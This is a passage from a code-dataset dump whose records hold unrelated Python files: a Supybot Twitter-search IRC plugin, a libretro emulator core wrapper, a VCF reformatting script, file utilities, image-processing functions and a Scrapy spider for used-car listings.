prepare string and output.\n location = data[0][\"locations\"][0][\"name\"]\n ttrends = \" | \".join([trend[\"name\"] for trend in data[0][\"trends\"]])\n irc.reply(\n \"Top Twitter Trends in {0} :: {1}\".format(self._bold(location), ttrends)\n )\n\n trends = wrap(trends, [getopts({\"exclude\": \"\"}), optional(\"text\")])\n\n def tsearch(self, irc, msg, args, optlist, optterm):\n \"\"\"[--num number] [--searchtype mixed|recent|popular] [--lang xx] [--nort] [--new] <term>\n Searches Twitter for the <term> and returns the most recent results.\n --num is number of results.\n --searchtype being recent, popular or mixed. Popular is the default.\n --new returns new messages since last search for <term> in channel.\n Ex: --num 3 breaking news\n \"\"\"\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the tsearch \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n self.since_id.setdefault(msg.channel, {})\n self.since_id[msg.channel].setdefault(\"{0}\".format(optterm), None)\n new = False\n # default arguments.\n tsearchArgs = {\n \"include_entities\": \"false\",\n \"tweet_mode\": \"extended\",\n \"count\": self.registryValue(\"defaultSearchResults\", msg.args[0]),\n \"lang\": \"en\",\n \"q\": utils.web.urlquote(optterm),\n }\n # check input.\n if optlist:\n for (key, value) in optlist:\n if key == \"num\": # --num\n maxresults = self.registryValue(\"maxSearchResults\", msg.args[0])\n if not (\n 1 <= value <= maxresults\n ): # make sure it's between what we should output.\n irc.reply(\n \"ERROR: '{0}' is not a valid number of tweets. Range is \"\n \"between 1 and {1}.\".format(value, maxresults)\n )\n return\n else: # change number to output.\n tsearchArgs[\"count\"] = value\n if key == \"searchtype\": # getopts limits us here.\n tsearchArgs[\n \"result_type\"\n ] = value # limited by getopts to valid values.\n if key == \"lang\": # lang <xx>. Uses ISO-639 codes like 'en'\n tsearchArgs[\"lang\"] = value\n if key == \"new\" and self.since_id[msg.channel][\"{0}\".format(optterm)]:\n new = True\n tsearchArgs[\"since_id\"] = self.since_id[msg.channel][\n \"{0}\".format(optterm)\n ]\n if key == \"nort\":\n tsearchArgs[\"q\"] += \" -filter:retweets\"\n # now build our API call.\n data = self.twitterApi.ApiCall(\"search/tweets\", parameters=tsearchArgs)\n if not data:\n if not new:\n irc.reply(\n \"ERROR: Something went wrong trying to search Twitter. ({0})\"\n .format(data)\n )\n log.error(\"Tweety: ERROR trying to search Twitter: {0}\".format(data))\n return\n try:\n data = json.loads(data)\n except:\n if not new:\n irc.reply(\n \"ERROR: Something went wrong trying to search Twitter. 
({0})\"\n .format(data)\n )\n log.error(\"Tweety: ERROR trying to search Twitter: {0}\".format(data))\n return\n # check the return data.\n results = data.get(\"statuses\") # data returned as a dict.\n if not results or len(results) == 0: # found nothing or length 0.\n if not new:\n irc.reply(\n \"ERROR: No Twitter Search results found for '{0}'\".format(optterm)\n )\n log.info(\n \"Tweety: No Twitter Search results found for '{0}': {1}\".format(\n optterm, data\n )\n )\n return\n else: # we found something.\n self.since_id[msg.channel][\"{0}\".format(optterm)] = results[0].get(\"id\")\n for result in results[0 : int(tsearchArgs[\"count\"])]: # iterate over each.\n nick = self._unescape(result[\"user\"].get(\"screen_name\"))\n name = self._unescape(result[\"user\"].get(\"name\"))\n verified = result[\"user\"].get(\"verified\")\n text = self._unescape(result.get(\"full_text\")) or self._unescape(\n result.get(\"text\")\n )\n date = self._time_created_at(result.get(\"created_at\"))\n tweetid = result.get(\"id_str\")\n # build output string and output.\n output = self._outputTweet(\n irc, msg, nick, name, verified, text, date, tweetid, None\n )\n irc.reply(output)\n\n tsearch = wrap(\n tsearch,\n [\n getopts(\n {\n \"num\": \"int\",\n \"searchtype\": (\"literal\", (\"popular\", \"mixed\", \"recent\")),\n \"lang\": \"somethingWithoutSpaces\",\n \"new\": \"\",\n \"nort\": \"\",\n }\n ),\n \"text\",\n ],\n )\n\n def twitter(self, irc, msg, args, optlist, optnick):\n \"\"\"[--noreply] [--nort] [--num <##>] [--info] [--new] [--id <id>] <nick>\n Returns last tweet or --num tweets. Shows all tweets, including RT and reply.\n To not display replies or RT's, use --noreply or --nort.\n Return new tweets since you last checked in channel with --new.\n Return specific tweet with --id <id>.\n Return information on user with --info.\n Ex: --info CNN | --id 337197009729622016 | --num 3 CNN\n \"\"\"\n self.since_id.setdefault(msg.channel, {})\n self.since_id[msg.channel].setdefault(\"{0}\".format(optnick), None)\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the twitter \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # now begin\n optnick = optnick.replace(\"@\", \"\") # strip @ from input if given.\n # default options.\n args = {\n \"id\": False,\n \"nort\": False,\n \"noreply\": False,\n \"url\": False,\n \"new\": False,\n \"num\": self.registryValue(\"defaultResults\", msg.args[0]),\n \"info\": False,\n }\n # handle input optlist.\n if optlist:\n for (key, value) in optlist:\n if key == \"id\":\n args[\"id\"] = True\n if key == \"url\":\n args[\"url\"] = True\n if key == \"nort\":\n args[\"nort\"] = True\n if key == \"noreply\":\n args[\"noreply\"] = True\n if key == \"new\":\n args[\"new\"] = True\n if key == \"num\":\n maxresults = self.registryValue(\"maxResults\", msg.args[0])\n if not (\n 1 <= value <= maxresults\n ): # make sure it's between what we should output.\n irc.reply(\n \"ERROR: '{0}' is not a valid number of tweets. 
Range is \"\n \"between 1 and {1}.\".format(value, maxresults)\n )\n return\n else: # number is valid so return this.\n args[\"num\"] = value\n if key == \"info\":\n args[\"info\"] = True\n # handle the four different rest api endpoint urls + twitterArgs dict for options.\n if args[\"id\"]: # --id #.\n apiUrl = \"statuses/show\"\n twitterArgs = {\n \"id\": optnick,\n \"include_entities\": \"false\",\n \"tweet_mode\": \"extended\",\n }\n elif args[\"info\"]: # --info.\n apiUrl = \"users/show\"\n twitterArgs = {\"screen_name\": optnick, \"include_entities\": \"false\"}\n elif args[\"new\"]: # --new.\n apiUrl = \"statuses/user_timeline\"\n if self.since_id[msg.channel][\"{0}\".format(optnick)]:\n twitterArgs = {\n \"screen_name\": optnick,\n \"since_id\": self.since_id[msg.channel][\"{0}\".format(optnick)],\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n else:\n twitterArgs = {\n \"screen_name\": optnick,\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n else: # if not an --id --info, or --new we're printing from their timeline.\n apiUrl = \"statuses/user_timeline\"\n twitterArgs = {\n \"screen_name\": optnick,\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n # call the Twitter API with our data.\n data = self.twitterApi.ApiCall(apiUrl, parameters=twitterArgs)\n if not data:\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: Failed to lookup Twitter for '{0}' ({1})\".format(\n optnick, data\n )\n )\n log.error(\n \"Tweety: ERROR looking up Twitter for '{0}': {1}\".format(\n optnick, data\n )\n )\n return\n try:\n data = json.loads(data)\n except:\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: Failed to lookup Twitter for '{0}' ({1})\".format(\n optnick, data\n )\n )\n log.error(\n \"Tweety: ERROR looking up Twitter for '{0}': {1}\".format(\n optnick, data\n )\n )\n return\n # before anything, check for errors. errmsg is conditional.\n if \"errors\" in data:\n if data[\"errors\"][0][\"code\"] == 34: # not found.\n if args[\"id\"]: # --id #. # is not found.\n errmsg = \"ERROR: Tweet ID '{0}' not found.\".format(optnick)\n else: # --info or twitter not found.\n errmsg = \"ERROR: Twitter user '{0}' not found.\".format(optnick)\n irc.reply(errmsg) # print the error and exit.\n return\n else: # errmsg is not 34. 
just return it.\n errmsg = data[\"errors\"][0]\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: {0} {1}\".format(errmsg[\"code\"], errmsg[\"message\"])\n )\n log.error(\n \"Tweety: ERROR: {0}: {1}\".format(errmsg[\"code\"], errmsg[\"message\"])\n )\n return\n # no errors, so we process data conditionally.\n if args[\"id\"]: # If --id was given for a single tweet.\n text = self._unescape(data.get(\"full_text\")) or self._unescape(\n data.get(\"text\")\n )\n nick = self._unescape(data[\"user\"].get(\"screen_name\"))\n name = self._unescape(data[\"user\"].get(\"name\"))\n verified = data[\"user\"].get(\"verified\")\n relativeTime = self._time_created_at(data.get(\"created_at\"))\n tweetid = data.get(\"id\")\n if data.get(\"retweeted_status\"):\n retweetid = data[\"retweeted_status\"].get(\"id\")\n else:\n retweetid = None\n # prepare string to output and send to irc.\n output = self._outputTweet(\n irc, msg, nick, name, verified, text, relativeTime, tweetid, retweetid\n )\n irc.reply(output)\n return\n elif args[\"info\"]: # --info to return info on a Twitter user.\n location = data.get(\"location\")\n followers = data.get(\"followers_count\")\n friends = data.get(\"friends_count\")\n description = self._unescape(data.get(\"description\"))\n screen_name = self._unescape(data.get(\"screen_name\"))\n created_at = data.get(\"created_at\")\n statuses_count = data.get(\"statuses_count\")\n protected = data.get(\"protected\")\n name = self._unescape(data.get(\"name\"))\n url = data.get(\"url\")\n # build output string conditionally. build string conditionally.\n ret = self._bu(\"@{0}\".format(screen_name))\n ret += \" ({0})\".format(name)\n if protected: # is the account protected/locked?\n ret += \" [{0}]:\".format(self._bu(\"LOCKED\"))\n else: # open.\n ret += \":\"\n if url: # do they have a url?\n ret += \" {0}\".format(self._ul(url))\n if description: # a description?\n ret += \" {0}\".format(self._unescape(description))\n ret += \" [{0} friends,\".format(self._bold(friends))\n ret += \" {0} tweets,\".format(self._bold(statuses_count))\n ret += \" {0} followers,\".format(self._bold(followers))\n ret += \" signup: {0}\".format(self._bold(self._time_created_at(created_at)))\n if location: # do we have location?\n ret += \" Location: {0}]\".format(self._bold(location))\n else: # nope.\n ret += \"]\"\n # finally, output.\n irc.reply(ret)\n return\n else: # this will display tweets/a user's timeline. can be n+1 tweets.\n if len(data) == 0: # no tweets found.\n if not args[\"new\"]:\n irc.reply(\"ERROR: '{0}' has not tweeted yet.\".format(optnick))\n log.info(\"Tweety: '{0}' has not tweeted yet.\".format(optnick))\n return\n self.since_id[msg.channel][\"{0}\".format(optnick)] = data[0].get(\"id\")\n for tweet in data: # n+1 tweets found. 
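'full_text' is present when\n # tweet_mode=extended is honoured; older payloads only carry 'text', hence\n # the fallback below. Now 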
iterate through each tweet.\n text = self._unescape(tweet.get(\"full_text\")) or self._unescape(\n tweet.get(\"text\")\n )\n nick = self._unescape(tweet[\"user\"].get(\"screen_name\"))\n name = self._unescape(tweet[\"user\"].get(\"name\"))\n verified = tweet[\"user\"].get(\"verified\")\n tweetid = tweet.get(\"id\")\n if tweet.get(\"retweeted_status\"):\n retweetid = tweet[\"retweeted_status\"].get(\"id\")\n else:\n retweetid = None\n relativeTime = self._time_created_at(tweet.get(\"created_at\"))\n # prepare string to output and send to irc.\n output = self._outputTweet(\n irc,\n msg,\n nick,\n name,\n verified,\n text,\n relativeTime,\n tweetid,\n retweetid,\n )\n irc.reply(output)\n\n twitter = wrap(\n twitter,\n [\n getopts(\n {\n \"noreply\": \"\",\n \"nort\": \"\",\n \"info\": \"\",\n \"id\": \"\",\n \"url\": \"\",\n \"new\": \"\",\n \"num\": \"int\",\n }\n ),\n \"somethingWithoutSpaces\",\n ],\n )\n\n\nClass = Tweety\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=279:\n","sub_path":"Tweety/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":37592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5594102","text":"'''\nfile: coreimpl.py\nauthor: Mike Young\n'''\n\nimport traceback\nimport ctypes\n\nfrom yg.handlers import HANDLER_MGR\nfrom entities.enums import LogLevel, PollType, RetroApi\nfrom entities.retrocore import RetroCore\nfrom entities.retrotypes import retro_video_refresh_t, \\\n retro_audio_sample_t, \\\n retro_audio_sample_batch_t, \\\n retro_input_state_t, \\\n retro_void_t\nfrom entities.structs import RetroSystemAvInfo\nfrom yg import logger\nfrom yg.utils import file_data_to_ctypes\nfrom libretromacros import RETRO_MACROS\n\n\nclass CoreImpl:\n ''' Based on RetroArch/core_impl.c '''\n _logger = logger\n\n def __init__(self, core):\n self.video_handler = HANDLER_MGR.video_handler\n self.audio_handler = HANDLER_MGR.audio_handler\n self.input_handler = HANDLER_MGR.input_handler\n\n self.api_version = RETRO_MACROS.RETRO_API_VERSION\n\n self.retro_ctx = {\n 'video_cb': None,\n 'audio_cb': None,\n 'audio_batch_cb': None,\n 'state_cb': None,\n 'poll_cb': None\n }\n self._current_core = RetroCore(core)\n\n def load(self, poll_type_behavior):\n self._current_core.poll_type = poll_type_behavior\n\n if not self.core_verify_api_version():\n return False\n if not self._init_libretro_cbs():\n return False\n\n self.core_get_system_av_info(self.video_handler.av_info)\n\n return True\n\n def core_get_system_info(self, retro_system_info):\n if not retro_system_info:\n return False\n self._current_core.retro_get_system_info(retro_system_info)\n return True\n\n def core_set_environment(self, retro_env):\n try:\n self._current_core.retro_set_environment(retro_env)\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def core_init(self):\n self._current_core.retro_init()\n self._current_core.initialized = True\n\n def core_verify_api_version(self):\n core_api_version = self._current_core.retro_api_version()\n self._logger.log(LogLevel.INFO, 'Current core Libretro API version: %u' % core_api_version)\n self._logger.log(\n LogLevel.INFO,\n 'App compiled against Libretro API version: %u' % self.api_version\n )\n\n if core_api_version != self.api_version:\n self._logger.log(LogLevel.WARN, 'Libretro ABI break!')\n return False\n return True\n\n def core_load_game(self, game_info_ptr):\n try:\n self.game_info = game_info_ptr\n 
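# retro_load_game() takes a pointer to a retro_game_info struct and returns a\n # boolean success flag (per the libretro API); we keep it on the core wrapper.\n 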
self._current_core.game_loaded = self._current_core.retro_load_game(game_info_ptr)\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n self._current_core.game_loaded = False\n return False\n\n\n def core_run(self):\n '''\n Poll and call retro_run\n RetroArch example included some netplay stuff which I excluded\n '''\n display = self.video_handler.current_driver.disp\n\n if self._current_core.poll_type == PollType.EARLY:\n self.input_handler.input_poll()\n elif self._current_core.poll_type == PollType.LATE:\n self._current_core.input_polled = False\n self._current_core.retro_run()\n\n if self._current_core.poll_type == PollType.LATE and not self._current_core.input_polled:\n self.input_handler.input_poll()\n\n def core_get_system_av_info(self, av_info):\n if not av_info:\n return False\n addr = ctypes.addressof(av_info)\n av_info_ptr = ctypes.cast(addr, ctypes.POINTER(RetroSystemAvInfo))\n self._current_core.retro_get_system_av_info(av_info_ptr)\n return True\n\n def core_set_controller_port_device(self, pad_dict):\n if not pad_dict:\n return False\n self._current_core.retro_set_controller_port_device(pad_dict['port'], pad_dict['device'])\n return True\n\n def core_unload_game(self):\n try:\n # self.video_handler.free_hw_context()\n # self.audio_handler.stop()\n\n self._current_core.retro_unload_game()\n\n self._current_core.game_loaded = False\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def core_unload(self):\n try:\n self._current_core.retro_deinit()\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def set_has_input_descriptors(self):\n self._current_core.has_set_input_descriptors = True\n\n def input_state_poll(self, port, device, idx, key_id):\n if self._current_core.poll_type == PollType.LATE:\n if not self._current_core.input_polled:\n self.input_handler.input_poll()\n self._current_core.input_polled = True\n\n return self.input_handler.input_state(port, device, idx, key_id)\n\n def input_state_poll_maybe(self):\n if self._current_core.poll_type == PollType.NORMAL.value:\n self.input_handler.input_poll()\n\n def _init_libretro_cbs(self):\n try:\n video_refresh = retro_video_refresh_t()\n self._current_core.core.retro_set_video_refresh.argtypes = [video_refresh]\n self._current_core.core.retro_set_video_refresh.restype = None\n self.retro_ctx['video_cb'] = video_refresh(self.video_handler.render_frame)\n\n audio_sample = retro_audio_sample_t()\n self._current_core.core.retro_set_audio_sample.argtypes = [audio_sample]\n self._current_core.core.retro_set_audio_sample.restype = None\n self.retro_ctx['audio_cb'] = audio_sample(self.audio_handler.sample)\n\n audio_sample_batch = retro_audio_sample_batch_t()\n self._current_core.core.retro_set_audio_sample_batch.argtypes = [audio_sample_batch]\n self._current_core.core.retro_set_audio_sample_batch.restype = ctypes.c_size_t\n self.retro_ctx['audio_batch_cb'] = audio_sample_batch(self.audio_handler.sample_batch)\n\n input_state = retro_input_state_t()\n self._current_core.core.retro_set_input_state.argtypes = [input_state]\n self._current_core.core.retro_set_input_state.restype = None\n self.retro_ctx['state_cb'] = input_state(self.input_state_poll)\n\n input_poll = retro_void_t()\n self._current_core.core.retro_set_input_poll.argtypes = [input_poll]\n self._current_core.core.retro_set_input_poll.restype = None\n self.retro_ctx['poll_cb'] = 
input_poll(self.input_state_poll_maybe)\n\n self._set_libretro_cbs()\n\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def _set_libretro_cbs(self):\n self._current_core.retro_set_video_refresh(self.retro_ctx['video_cb'])\n self._current_core.retro_set_audio_sample(self.retro_ctx['audio_cb'])\n self._current_core.retro_set_audio_sample_batch(self.retro_ctx['audio_batch_cb'])\n self._current_core.retro_set_input_poll(self.retro_ctx['poll_cb'])\n self._current_core.retro_set_input_state(self.retro_ctx['state_cb'])\n","sub_path":"coreimpl.py","file_name":"coreimpl.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27410129","text":"import argparse\nimport pandas as pd\nimport csv\n\nparser = argparse.ArgumentParser(description='name')\nparser.add_argument('-n', dest='name', type=str, help=\"name of vcf file\")\n\n#name='final_SRR6463548_filtered.vcfext.vcf'\nargs = parser.parse_args()\nname=args.name\nname2='fixed'+name\nname3='fixedPOS'+name\n#name3='fixedPOS'+name[:-4]+'.csv'\n\n#print(pd.read_csv(name))\n\n#with open(name, mode='r') as f1:\n #print(f1.read())\n# Lines = f1.readlines() \n# for line in Lines: \n# print(len(line.split()), \"columns\")\n# baseCol=len(line.split())\n# break\n\n#with open(name, mode='r') as f1:\n #print(f1.read())\n# Lines = f1.readlines() \n# for line in Lines: \n# if len(line.split()) > baseCol\n\nwith open(name, mode='r') as f1:\n with open(name2, mode='w') as f2:\n #print(f1.read())\n Lines = f1.readlines() \n for line in Lines: \n f2.write(line)\n break\n\n\nwith open(name, mode='r') as f1:\n with open(name2, mode='a') as f2:\n #print(f1.read())\n Lines = f1.readlines()\n #testcount=0\n protein=\"\"\n for line in Lines: \n #testcount+=1\n count=0\n for word in line.split():\n if word.startswith(\"c.\"):\n count+=1\n if word.startswith(\"n.\"):\n count+=1\n if word.startswith(\"p.\"):\n protein=word\n #if protein in line: print(\"true\")\n for x in range((count)):\n count2=-1\n for word in line.split():\n if word.startswith(\"c.\") == False and word.startswith(\"n.\") == False:\n f2.write(word+\"\\t\")\n if word.startswith(\"c.\"):\n count2+=1\n if word.startswith(\"n.\"):\n count2+=1\n if x == count2 and protein in line:\n #print(x)\n if word.startswith(\"c.\"):\n f2.write(word+\"\\t\"+protein+\"\\n\")\n break\n if word.startswith(\"n.\"):\n f2.write(word+\"\\t\"+protein+\"\\n\")\n break\n if x == count2 and protein not in line:\n #print(x)\n if word.startswith(\"c.\"):\n f2.write(word+\"\\n\")\n break\n if word.startswith(\"n.\"):\n f2.write(word+\"\\n\")\n break\n #if testcount ==2:\n # break\n\n\n with open(name, mode='r') as f1:\n with open(name3, mode='w') as f3:\n #print(f1.read())\n Lines = f1.readlines() \n for line in Lines: \n f3.write(line)\n break\n\n with open(name2, mode='r') as f2:\n with open(name3, mode='a') as f3:\n #print(f1.read())\n Lines = f2.readlines()\n #testcount=0\n start=0\n for line in Lines: \n #testcount+=1\n start+=1\n tempword=\"\"\n tempcount=0\n count=0\n for word in line.split():\n tempcount+=1\n if word.startswith(\"c.\") and \"+\" not in word and \"-\" not in word:\n for character in word: \n if character.isdigit():\n tempword+=character\n if word.startswith(\"n.\") and \"+\" not in word and \"-\" not in word:\n for character in word: \n if character.isdigit():\n tempword+=character\n if word.startswith(\"c.\") and \"+\" in word or \"-\" in word:\n 
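# NOTE: 'and' binds tighter than 'or', so this test (and the matching 'n.' one\n # below) also fires for ANY word containing '-'; the intended grouping was\n # probably startswith(...) and ('+' in word or '-' in word).\n 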
start=1\n if word.startswith(\"n.\") and \"+\" in word or \"-\" in word:\n start=1\n if start>1:\n for word in line.split():\n count+=1\n if count==2:\n f3.write(tempword+\"\\t\")\n if count!=2:\n if count == tempcount:\n f3.write(word+\"\\n\")\n else: f3.write(word+\"\\t\")\n","sub_path":"vcfcsv3.py","file_name":"vcfcsv3.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152850364","text":"__author__ = 'Nik Sheridan'\n\n\nimport time\nimport pickle\n\n\ndef file_to_list_stripped(userfile):\n '''\n Opens, reads then closes file specified in \"userfile\" variable from filesystem\n Intended use case: TEXT\n Returns: outputList\n '''\n file = open(userfile)\n outputList = []\n filelist = file.readlines()\n file.close()\n for item in filelist:\n outputList.append(item.strip())\n return outputList\n\n\ndef file_to_list_stripped_and_split(userfile):\n '''\n Opens, reads then closes file specified in \"userfile\" variable from filesystem, and splits into nested lists\n Intended use case: Good for\n Returns: outputList\n '''\n file = open(userfile)\n outputList = []\n filelist = file.readlines()\n file.close()\n for item in filelist:\n #outputList.append(item.strip())\n split_item = item.split()\n outputList.append(split_item)\n return outputList\n\n\ndef file_to_list_stripped_right_only(userfile):\n '''\n :param userfile:\n :return: list from file without the crap on the right hand side\n Use case: Good for Cisco config file generation from templates (retains indentation on the left)\n '''\n file = open(userfile, 'r')\n config_lines_with_newline_ends = file.readlines()\n file.close()\n config_lines = []\n for line in config_lines_with_newline_ends:\n config_lines.append(line.rstrip())\n return config_lines\n\n\ndef suffix_timestamp(orig_name):\n '''\n Dependant on importing 'time' library\n Takes orig_name and adds a timestamp with a '.txt' extension\n Returns new_name\n '''\n new_name = orig_name + \".\" + time.strftime(\"%Y%m%d\") + \".txt\"\n return new_name\n\n\ndef list2pickled(index,list,picklefile):\n print('hello')\n\nclass networkInterface(object):\n\n def __init__(self, networkInterface):\n self.configItem = networkInterface\n\n\ndef main():\n my_list1 = file_to_list_stripped(\"..\\\\OfficeReference.txt\")\n my_list2 = file_to_list_stripped_and_split(\"C:\\\\Data\\\\Storage\\\\Coding\\\\referenceCodeNetworkUtilities\\\\OfficeReference.txt\")\n my_list3 = file_to_list_stripped_right_only(\"C:\\\\Data\\\\Storage\\\\Coding\\\\referenceCodeNetworkUtilities\\\\OfficeReference.txt\")\n print('Output from file_to_list_stripped method')\n print(my_list1)\n print('\\n')\n print('file_to_list_stripped_and_split')\n print(my_list2)\n print('\\n')\n print('file_to_list_stripped_right_only')\n print(my_list3)\n print('\\n')\n\n pickle.dump(my_list2,open( \"..\\\\OfficeReference.p\", \"wb\" ))\n my_list4 = pickle.load( open( \"..\\\\OfficeReference.p\", \"rb\" ) )\n\n print('This is the imported pickled list')\n print(my_list4)\n\n #object_list = []\n #for item in my_list:\n # object_list.append(networkInterface(item))\n # print(object_list)\n #\n #print(object_list[0].configItem)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"ReferenceMethods/ReferenceMethodsV0002.py","file_name":"ReferenceMethodsV0002.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461945686","text":"# from PIL import Image 
# To import an image.\nimport matplotlib.pyplot as plt # To display an image\nimport numpy # To manipulate matrices\nfrom scipy import misc # To load an image\nfrom copy import deepcopy\n#This is just a test # This is dump, Erin.\n\ndef display(image):\n plt.imshow(image)\n plt.show()\n\n\ndef edge_detection(image, threshold):\n edges = deepcopy(image)\n # Create white edge image.\n for i in range(len(image)):\n for j in range(len(image[0])):\n edges[i][j] = [255, 255, 255]\n\n for i in range(1, len(image) - 1):\n for j in range(1, len(image[0]) - 1):\n for k in [0]:\n\n diffs = []\n diffs.append(abs(image[i][j][k] - image[i - 1][j - 1][k]))\n diffs.append(abs(image[i][j][k] - image[i][j - 1][k]))\n diffs.append(abs(image[i][j][k] - image[i + 1][j - 1][k]))\n # diffs.append(abs(image[i][j][k] - image[i - 1][j - 1][k]))\n # diffs.append(abs(image[i][j][k] - image[i - 1][j][k]))\n\n add_edge = 0\n for diff in diffs:\n if diff > threshold:\n add_edge += 1\n\n # if add_edge == len(diffs):\n if abs(sum(diffs)) / len(diffs) > threshold:\n edges[i][j] = [0, 0, 0]\n display(image)\n display(edges)\n\n\ndef image_inverse(image):\n new_image = deepcopy(image)\n for i in range(len(image)):\n for j in range(len(image[0])):\n for k in range(3):\n new_image[i][j][k] = 255 - new_image[i][j][k]\n\n display(image)\n display(new_image)\n\n\ndef linear_combination(image1, image2, a=0.5):\n image1 *= a\n image2 *= (1 - a)\n comp = numpy.add(image1, image2)\n display(comp)\n\n\ndef composite(overlay, backgound):\n new_image = deepcopy(overlay)\n\n for i in range(len(overlay)):\n for j in range(len(overlay[0])):\n for k in range(3):\n if overlay[i][j][k] < 180:\n new_image[i][j][k] = overlay[i][j][k]\n else:\n new_image[i][j][k] = backgound[i][j][k]\n\n display(new_image)\n\n# Read in images.\ntoad = misc.imread(\"toad.jpg\")\nripon = misc.imread(\"ripon.jpg\")\nlamb = misc.imread(\"lamb.jpg\")\ntin = misc.imread(\"tin.jpg\")\nhair = misc.imread(\"hair.jpg\")\ndorothy = misc.imread(\"dorothy.png\")\n\n\n# Do edge detection\nedge_detection(ripon, 100)\n# edge_detection(tin, 250)\n\n# image_inverse(dorothy)\n\n#composite(hair, lamb)\n\n#linear_combination(lamb, hair, a=0.4)\n#display(hair)\n","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"24151555","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json, re\nfrom myproject.items import GuaziItem\n# import the CrawlSpider/LinkExtractor classes for rule-based (deep) crawling\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\n\n\nclass GuzziSpider(CrawlSpider):\n name = 'guazicrawl'\n\n start_urls = ['http://www.guazi.com/sjz/dazhong/']\n # rules can only match URLs\n rules = (\n # extract links matching the pagination URLs and follow them (no callback means follow defaults to True)\n Rule(LinkExtractor(allow=('/sjz/dazhong/o\\d+/#bread',))),\n\n # extract the links leading from a Volkswagen listing to its detail page and parse them with the spider's parse_item method\n Rule(LinkExtractor(allow=('/sjz/\\w{17}\\.htm#fr_page=list&fr_pos=city&fr_no=\\d+',)), callback='parse_item'),\n )\n\n # scrape the details from the detail page: title, price, mileage, URL\n def parse_item(self, response):\n guazi = GuaziItem() # the GuaziItem class and its fields must be defined in items.py\n body = response.text.replace('\\\\n', '').replace('\\\\t', '').replace('\\\\r', '')\n # NOTE: the closing-tag text in these patterns was stripped when this file was captured; '<' below is an assumed stand-in delimiter.\n title = re.findall('class=\"titlebox\">(.*?)<', body)\n if len(title) > 0:\n guazi[\"name\"] = title[0]\n price = re.findall('class=\"pricestype\">(.*?)<', body)\n if len(price) > 
0:\n guazi[\"price\"] = price[0]\n licheng = re.findall('class=\"assort clearfix\">.*?\"two\">(.*?)<', body)\n if len(licheng) > 0:\n guazi[\"licheng\"] = licheng[0]\n guazi[\"url\"] = response.url\n yield guazi\n\n\n","sub_path":"Scrapyt/myproject/myproject/spiders/guazicrawl.py","file_name":"guazicrawl.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
